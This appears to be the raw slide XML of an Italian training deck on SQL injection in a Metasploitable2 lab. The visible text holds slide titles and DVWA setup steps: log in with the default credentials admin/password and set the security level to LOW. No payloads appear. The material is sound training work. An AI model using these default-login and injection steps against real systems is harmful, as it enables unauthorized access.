                <a:path h="1625468" w="2024778">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2024778" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2024778" y="1625468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1625468"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="ABDB2A"/>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 4" id="4"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-28575"/>
              <a:ext cx="2024778" cy="1654043"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2239"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 5" id="5"/>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6" id="6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="17488106" y="9502973"/>
            <a:ext cx="402082" cy="402082"/>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9" id="9"/>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0" id="10"/>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16</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 11" id="11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="0" y="0"/>
            <a:ext cx="8777564" cy="10287000"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="11703418" cy="13716000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr name="Picture 12" id="12"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="true"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:srcRect l="23109" t="0" r="19934" b="0"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="11703418" cy="13716000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 13" id="13"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="8833649" y="3018071"/>
            <a:ext cx="7652417" cy="3169317"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="8299"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="7280">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="HK Modular"/>
                <a:ea typeface="HK Modular"/>
                <a:cs typeface="HK Modular"/>
                <a:sym typeface="HK Modular"/>
              </a:rPr>
              <a:t>attacchi SQl injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 14" id="14"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="9640317" y="6254426"/>
            <a:ext cx="6052409" cy="816610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2239"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1599">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Esempi di attacco SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2239"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1599">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>in ambiente</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2239"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1599">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t> Metasploitable2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="u"/>
  </p:transition>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 2" id="2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="8308384" y="1835644"/>
            <a:ext cx="8240918" cy="6615711"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2024778" cy="1625468"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 3" id="3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="2024778" cy="1625468"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="1625468" w="2024778">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2024778" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2024778" y="1625468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1625468"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="ABDB2A"/>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 4" id="4"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-28575"/>
              <a:ext cx="2024778" cy="1654043"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2239"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 5" id="5"/>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6" id="6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="17488106" y="9502973"/>
            <a:ext cx="402082" cy="402082"/>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9" id="9"/>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0" id="10"/>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17</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 11" id="11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="0" y="0"/>
            <a:ext cx="8777564" cy="10287000"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="11703418" cy="13716000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr name="Picture 12" id="12"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="true"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:srcRect l="23109" t="0" r="19934" b="0"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="11703418" cy="13716000"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 13" id="13"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="8840313" y="1974183"/>
            <a:ext cx="7652417" cy="4219964"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="8299"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="7280">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="HK Modular"/>
                <a:ea typeface="HK Modular"/>
                <a:cs typeface="HK Modular"/>
                <a:sym typeface="HK Modular"/>
              </a:rPr>
              <a:t>attacchi SQl injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="8299"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="7280">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="HK Modular"/>
                <a:ea typeface="HK Modular"/>
                <a:cs typeface="HK Modular"/>
                <a:sym typeface="HK Modular"/>
              </a:rPr>
              <a:t>CLASSIC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 14" id="14"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="9640317" y="6254426"/>
            <a:ext cx="6052409" cy="816610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2239"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1599">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Esempi di attacco SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2239"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1599">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>in ambiente</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2239"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1599">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t> Metasploitable2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="l"/>
  </p:transition>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7" id="7"/>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8" id="8"/>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18</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 9" id="9"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 10" id="10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1867447" y="1835644"/>
            <a:ext cx="7139757" cy="3139257"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="9519675" cy="4185675"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr name="Picture 11" id="11"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="true"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:srcRect l="0" t="4199" r="0" b="4199"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="9519675" cy="4185675"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 12" id="12"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1867447" y="5312099"/>
            <a:ext cx="7139757" cy="3139257"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1754225" cy="771309"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 13" id="13"/>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4" id="14"/>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5" id="15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="9280796" y="1835644"/>
            <a:ext cx="7139757" cy="3139257"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1754225" cy="771309"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 16" id="16"/>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7" id="17"/>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8" id="18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="9280796" y="5312099"/>
            <a:ext cx="7139757" cy="3139257"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="9519675" cy="4185675"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr name="Picture 19" id="19"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="true"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:srcRect l="0" t="9560" r="0" b="9560"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="9519675" cy="4185675"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 20" id="20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1476431" y="1409727"/>
            <a:ext cx="782032" cy="1903146"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="556429" cy="1354120"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 21" id="21"/>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22" id="22"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 23" id="23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="16029537" y="6967452"/>
            <a:ext cx="782032" cy="1903146"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="556429" cy="1354120"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 24" id="24"/>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25" id="25"/>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sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 26" id="26"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="4178822" y="5977608"/>
            <a:ext cx="2788414" cy="692150"/>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Configurazione livello di difficoltà</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 27" id="27"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="2464800" y="5685355"/>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02</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 28" id="28"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="11592171" y="3041264"/>
            <a:ext cx="4250078" cy="1369060"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2239"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1599">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Inserite l’indirizzo IP della vostra macchina Metasploitable2 ed eseguite l’accesso alla DVWA con le credenziali di default :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2239"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1599">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>admin per lo Username</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2239"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1599">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>password per la Password</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 29" id="29"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="11592171" y="2501153"/>
            <a:ext cx="2788414" cy="339725"/>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Accesso alla DVWA </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 30" id="30"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="9878149" y="2208901"/>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01</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 31" id="31"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="4178822" y="6720878"/>
            <a:ext cx="4250078" cy="540385"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="2239"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1599">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Selezionare </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1599">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans Bold"/>
                <a:ea typeface="Open Sans Bold"/>
                <a:cs typeface="Open Sans Bold"/>
                <a:sym typeface="Open Sans Bold"/>
              </a:rPr>
              <a:t>&lt;&lt;DVWA Security&gt;&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1599">
                <a:solidFill>
                  <a:srgbClr val="121212"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t> ed impostare il livello a LOW</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="l"/>
  </p:transition>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7" id="7"/>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8" id="8"/>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19</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 9" id="9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1867447" y="2366400"/>
            <a:ext cx="7139757" cy="5554200"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="9519675" cy="7405600"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr name="Picture 10" id="10"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="true"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:srcRect l="16061" t="0" r="16061" b="28818"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false">
              <a:off x="0" y="0"/>
              <a:ext cx="9519675" cy="7405600"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 11" id="11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="9281659" y="2361301"/>
            <a:ext cx="7139757" cy="5554200"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1754225" cy="1364656"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 12" id="12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="false" flipV="false" rot="0">
              <a:off x="0" y="0"/>
              <a:ext cx="1754225" cy="1364656"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect r="r" b="b" t="t" l="l"/>
              <a:pathLst>
                <a:path h="1364656" w="1754225">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1754225" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1754225" y="1364656"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1364656"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="ABDB2A"/>
            </a:solidFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="TextBox 13" id="13"/>
            <p:cNvSpPr txBox="true"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-28575"/>
              <a:ext cx="1754225" cy="1393231"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr" rtlCol="false" tIns="50800" lIns="50800" bIns="50800" rIns="50800"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPts val="2239"/>
                </a:lnSpc>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 14" id="14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="1476431" y="1409727"/>
            <a:ext cx="782032" cy="1903146"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="556429" cy="1354120"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 15" id="15"/>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16" id="16"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 17" id="17"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="0">
            <a:off x="16030399" y="6507463"/>
            <a:ext cx="782032" cy="1903146"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="556429" cy="1354120"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 18" id="18"/>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19" id="19"/>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sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 20" id="20"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="9599122" y="4943947"/>
            <a:ext cx="6431277" cy="540385"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
